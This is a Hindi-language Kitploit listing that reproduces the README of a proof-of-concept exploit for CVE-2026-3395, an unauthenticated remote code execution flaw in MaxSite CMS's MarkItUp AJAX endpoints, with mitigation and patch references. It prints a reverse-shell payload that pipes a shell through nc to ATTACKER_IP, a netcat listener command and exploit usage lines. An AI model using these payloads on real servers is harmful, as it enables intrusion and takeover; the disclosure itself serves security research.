Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

फ़ीडसंपर्कगोपनीयता© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHub
GitHub
/mbanyamer
/cve-2026-3395-maxsite-cms-unauthenticated-rce
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षारेड टीमिंग
GitHubmbanyamer/cve-2026-3395-maxsite-cms-unauthenticated-rce

CVE-2026-3395-MaxSite-CMS-Unauthenticated-RCE

MaxSite CMS <= 109.1 में MarkItUp एडिटर AJAX एंडपॉइंट्स के माध्यम से बिना प्रमाणीकरण के रिमोट कोड निष्पादन के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जिसमें डिटेक्शन और रिवर्स शेल पेलोड शामिल हैं।

रिपॉजिटरी देखें
5207 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE‑2026‑3395 — MaxSite CMS में बिना प्रमाणीकरण के रिमोट कोड निष्पादन

Author Country Instagram GitHub CVE Exploit Type CVSS

अवलोकन

MaxSite CMS ≤ 109.1 में बिना प्रमाणीकरण के रिमोट कोड निष्पादन (RCE) भेद्यता।

यह दोष MarkItUp एडिटर प्लगइन के AJAX एंडपॉइंट्स में कमज़ोर प्राधिकरण जाँचों के साथ-साथ run_php प्लगइन द्वारा उपयोगकर्ता-आपूर्ति PHP कोड के असुरक्षित निष्पादन से उत्पन्न होता है।

  • खोजा गया / ठीक किया गया: मार्च 2026
  • पैच किया गया: MaxSite CMS 109.2 में
  • विक्रेता: MaxSite CMS
  • रिपॉजिटरी: maxsite/cms

विवरण

यह भेद्यता MarkItUp एडिटर प्लगइन में निम्नलिखित फ़ाइलों को प्रभावित करती है:

  • preview-ajax.php
  • autosave-post-ajax.php

ये एंडपॉइंट्स:

  • बिना प्रमाणीकरण के पहुँच योग्य हैं
  • केवल कमज़ोर रेफरर सत्यापन करते हैं (आसानी से बायपास किया जा सकता है)
  • उपयोगकर्ता इनपुट को run_php प्लगइन में पास करते हैं
  • eval() का उपयोग करके [php]...[/php] शॉर्टकोड निष्पादित करते हैं

एक हमलावर /ajax/ रूट पर एक क्राफ्टेड POST अनुरोध भेज सकता है जिसमें data पैरामीटर के माध्यम से Base64-एन्कोडेड आंतरिक पथ और दुर्भावनापूर्ण PHP पेलोड शामिल होता है, जिसके परिणामस्वरूप:

🚨 पूर्ण बिना प्रमाणीकरण के रिमोट कोड निष्पादन


हमले का प्रवाह आरेख

graph TD
    A["Attacker"] -->|"Malicious POST Request"| B["AJAX Endpoint"]
    B -->|"Referer Spoofing"| C["preview-ajax.php"]
    C -->|"Unsanitized Input"| D["run_php Plugin"]
    D -->|"eval() Execution"| E["Arbitrary PHP Execution"]
    E -->|"Command Execution"| F["Compromised Server"]

पूर्वापेक्षाएँ

  • MaxSite CMS संस्करण ≤ 109.1
  • run_php प्लगइन सक्षम (सामान्य डिफ़ॉल्ट)
  • PHP कॉन्फ़िगरेशन eval() की अनुमति देता है

शोषण

एक Python 3 प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट (exploit.py) शामिल है।

डिटेक्शन पेलोड (गैर-विनाशकारी)

[php]echo 'RCE CONFIRMED - ' . phpversion();[/php]

रिवर्स शेल पेलोड

[php]system('rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc ATTACKER_IP ATTACKER_PORT >/tmp/f');[/php]

उपयोग

1. लिसनर शुरू करें

nc -lvnp 9001

2. एक्सप्लॉइट चलाएँ

python3 exploit.py http://target.com --lhost 10.10.14.22 --lport 9001

शमन

तत्काल कार्रवाई

  • MaxSite CMS 109.2 या उसके बाद में अपग्रेड करें
  • यदि आवश्यक न हो तो run_php प्लगइन अक्षम करें

मैनुअल पैच

भेद्य फ़ाइलों में प्रमाणीकरण जाँचें जोड़ें:

if (!is_login()) {
    die('Access denied');
}
mso_checkreferer();

संदर्भ

  • पैच कमिट https://github.com/maxsite/cms/commit/08937a3c5d672a242d68f53e9fccf8a748820ef3

  • भेद्यता प्रविष्टि https://vuldb.com/?id.348281

  • NVD रिकॉर्ड https://nvd.nist.gov/vuln/detail/CVE-2026-3395


कानूनी नोटिस

यह प्रोजेक्ट निम्नलिखित के लिए प्रदान किया गया है:

  • सुरक्षा अनुसंधान
  • शैक्षिक उद्देश्य
  • अधिकृत पेनेट्रेशन टेस्टिंग

⚠️ स्पष्ट अनुमति के बिना सिस्टम के विरुद्ध उपयोग न करें।

लेखक दुरुपयोग या क्षति के लिए कोई ज़िम्मेदारी नहीं लेता है।


लेखक

Mohammed Idrees Banyamer जॉर्डन 🇯🇴 सुरक्षा शोधकर्ता

banyamer_security — Silent Hunter • Shadow Presence

मार्च 2026

टूल डाउनलोड करें